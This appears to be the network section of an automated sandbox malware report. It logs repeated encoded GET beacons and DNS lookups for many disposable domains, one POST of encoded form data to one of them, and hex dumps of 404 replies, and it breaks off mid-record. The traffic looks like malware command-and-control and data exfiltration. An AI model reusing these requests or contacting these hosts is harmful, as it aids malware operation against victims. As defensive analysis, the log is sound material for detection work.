                Source: global trafficHTTP traffic detected: GET /wb7v/?6aonl5x=IA0aHAKfw1DI7BcY7ryjbxCppHi9OmzIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpHPOs3B1qYTvrd0Qj0s=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /r2k9/?6aonl5x=R82aEe+RY/7ruopLNyHjIZCKrihy+djUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfXMMWJW+Krmg6/pm3HE=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rbqc/?6aonl5x=3OhzIPQDpE/WyOq7C50qyvj3dc8PiYJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPw974q4r0F7yEJBb1u8=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.iglpg.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /pfw9/?6aonl5x=45l5W170mEENNSUktK0c1bHcj3rn0rpe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF2xmeGRELDNSdfeX9e8=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4gxa/?6aonl5x=IVIViSCd4+diLw5iv6lFKzUz3DzQ1kWsQQRVAN/m1p/rxaGnfzS1IlrZSHFapfjNT88wuN41KZDTvbIxWygyz4hNkR6cPF/DwShRWPnwmriOjp5z/OZQWVs=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /5ltk/?6aonl5x=lFCyjgUgRWTJD3PvHrx0okuLDoXTkt/loKBcMldX7EHyWmdK0Vf5T1rkkoFAHq8jWgOppi08ScKStlrsdMkFXoBVPkBmvOuk6JZ8uBPhbCVyIuKgJdug7RU=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.superiorfencing.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vz2d/?6aonl5x=xnuAwqhG0E1cgnLHCuPG8putHNvOywveoj5D04lQyE1r/ADkIFYhezZZAVu20e8okSIJRDKdbgbPnaZH6+cIwh3xzWT5SsSVbw2mIitnDZbRgyAsQQEm3mk=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.kmmm759j.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /227m/?6aonl5x=zu1kjW5LnnBHDrOoJJXjEyap72qsvzZWMrrFEEjR4VpE0fuyjq12ZNIz8+5tcycS4E2gPV8m77870zUeK486K4PDE8XvvsLaWTViceKvZ+jMyMjrF9JiWcw=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.hemph.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vxxt/?6aonl5x=jMu8lGE22mRQMFkA02Z4QgHVvRKiIIAfjF1Au58NL63AyUoRBgSkNxa8Io3HGFLKqYvOjgOM4kRS/vuEKI7jIA/GEFV6EXDHqvtGhZ86XLQwQ00v5R3xroM=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.bootleggersrt.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /j7ub/?6aonl5x=M31vjVse/vBHPClvW92sHY7DTEoHQnoyrxzVLyROLYYAQdrxO36MkUElM+4Sk6N4OaZzF61ZUyEPGTTLpIW+aC9+xnt1oIHfkyDsG4AUT/SJuMBYTZz9qAA=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.rafconstrutora.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzA+H3rtA/rIZAdo0g/oDUTfbsJ2pfg1bAoxQTquSVCJvkgdI11EDq3zwrg4WM3Dp4Vk=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.seeseye.websiteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hz0b/?6aonl5x=JROsr6XP0vanBqI2CkbfACfn4SREJ4FMNJe05cc7We4KkOx2vOGxfRrWwD+RlhqEl2hqIbM9QtMk4VzKe4CXg9WRehnE4hJqVKIjnZFs25X2kR+IF22FPb4=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.samundri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /smoc/?6aonl5x=lPVxR6/rWOJUAmNkBdPYmYT9z/j33Ol+ibkJWFBTXqAA3JwmClrtL6XObj0m4TTFla53vfd2ewxujMvJwABfMfcmIBnaaalZ+S7LqTZAqXv17vO/nvgn6IY=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.dymar.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y1af/?6aonl5x=IqLRcMuEYJF3qnHudOsUzMwj/zs+8hv653U5jAETSKTHOAZ6DMxoKSmDfoiNXSDpEOcnUvDePh8sSvYUl7mpsmobIWXHnSvdrxN11MHL3cA/rWK2VFF3/cE=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.bahaeng.comConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /raea/?6aonl5x=PqKj/8KuIq0WSNkJftYVxtH3PgUbwps1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVXeOdEURVWf/EIQOijo=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jytl/?6aonl5x=g6hM5OfAy0aZTOdzzizqGwSFwxhc1L9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGnRIPeEv+Y3Y8H3JjIc=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wb7v/?6aonl5x=IA0aHAKfw1DI7BcY7ryjbxCppHi9OmzIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpHPOs3B1qYTvrd0Qj0s=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /r2k9/?6aonl5x=R82aEe+RY/7ruopLNyHjIZCKrihy+djUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfXMMWJW+Krmg6/pm3HE=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rbqc/?6aonl5x=3OhzIPQDpE/WyOq7C50qyvj3dc8PiYJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPw974q4r0F7yEJBb1u8=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.iglpg.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /pfw9/?6aonl5x=45l5W170mEENNSUktK0c1bHcj3rn0rpe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF2xmeGRELDNSdfeX9e8=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4gxa/?6aonl5x=IVIViSCd4+diLw5iv6lFKzUz3DzQ1kWsQQRVAN/m1p/rxaGnfzS1IlrZSHFapfjNT88wuN41KZDTvbIxWygyz4hNkR6cPF/DwShRWPnwmriOjp5z/OZQWVs=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /5ltk/?6aonl5x=lFCyjgUgRWTJD3PvHrx0okuLDoXTkt/loKBcMldX7EHyWmdK0Vf5T1rkkoFAHq8jWgOppi08ScKStlrsdMkFXoBVPkBmvOuk6JZ8uBPhbCVyIuKgJdug7RU=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.superiorfencing.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vz2d/?6aonl5x=xnuAwqhG0E1cgnLHCuPG8putHNvOywveoj5D04lQyE1r/ADkIFYhezZZAVu20e8okSIJRDKdbgbPnaZH6+cIwh3xzWT5SsSVbw2mIitnDZbRgyAsQQEm3mk=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.kmmm759j.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.christinascuties.net
                Source: global trafficDNS traffic detected: DNS query: www.techmiseajour.net
                Source: global trafficDNS traffic detected: DNS query: www.aktmarket.xyz
                Source: global trafficDNS traffic detected: DNS query: www.golivenow.live
                Source: global trafficDNS traffic detected: DNS query: www.iglpg.online
                Source: global trafficDNS traffic detected: DNS query: www.1qcczjvh2.autos
                Source: global trafficDNS traffic detected: DNS query: www.gk88top.top
                Source: global trafficDNS traffic detected: DNS query: www.superiorfencing.net
                Source: global trafficDNS traffic detected: DNS query: www.kmmm759j.sbs
                Source: global trafficDNS traffic detected: DNS query: www.hemph.online
                Source: global trafficDNS traffic detected: DNS query: www.bootleggersrt.online
                Source: global trafficDNS traffic detected: DNS query: www.rafconstrutora.online
                Source: global trafficDNS traffic detected: DNS query: www.seeseye.website
                Source: global trafficDNS traffic detected: DNS query: www.samundri.online
                Source: global trafficDNS traffic detected: DNS query: www.dymar.shop
                Source: global trafficDNS traffic detected: DNS query: www.bahaeng.com
                Source: unknownHTTP traffic detected: POST /jytl/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.techmiseajour.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 204Origin: http://www.techmiseajour.netReferer: http://www.techmiseajour.net/jytl/User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 36 61 6f 6e 6c 35 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 6a 58 57 57 38 6f 2b 69 48 76 4a 6a 79 4b 67 55 56 58 4f 31 65 71 6c 51 36 64 30 6d 65 47 59 61 4c 51 3d 3d Data Ascii: 6aonl5x=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUjXWW8o+iHvJjyKgUVXO1eqlQ6d0meGYaLQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 03 Dec 2024 08:47:41 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:48:24 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:48:26 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:48:29 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" 